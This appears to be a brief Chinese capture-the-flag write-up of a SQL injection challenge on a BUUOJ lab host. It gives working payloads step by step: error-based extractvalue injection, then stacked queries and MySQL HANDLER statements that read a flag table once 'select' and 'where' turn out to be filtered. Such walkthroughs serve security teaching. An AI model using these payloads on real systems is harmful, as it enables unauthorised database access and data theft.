使用单引号进行闭合,发现报错
尝试报错注入,发现过滤select,where关键字
http://720c503a-2cc6-49df-b546-18f9725fb031.node3.buuoj.cn/?inject=1'and (extractvalue(1,concat(0x7e,(select database()),0x7e)))--+
将select去掉,爆出数据库名
http://720c503a-2cc6-49df-b546-18f9725fb031.node3.buuoj.cn/?inject=1'and (extractvalue(1,concat(0x7e,(database()),0x7e)))--+
因为过滤了select和where关键字,报错注入不能进行下去,尝试使用堆叠注入
查询表
http://720c503a-2cc6-49df-b546-18f9725fb031.node3.buuoj.cn/?inject=1';show tables--+
查询字段
http://720c503a-2cc6-49df-b546-18f9725fb031.node3.buuoj.cn/?inject=1';show columns from FlagHere--+
查询数据,因为select无法使用,可以用handler进行代替
http://720c503a-2cc6-49df-b546-18f9725fb031.node3.buuoj.cn/?inject=1';handler FlagHere open;handler FlagHere read first;--+
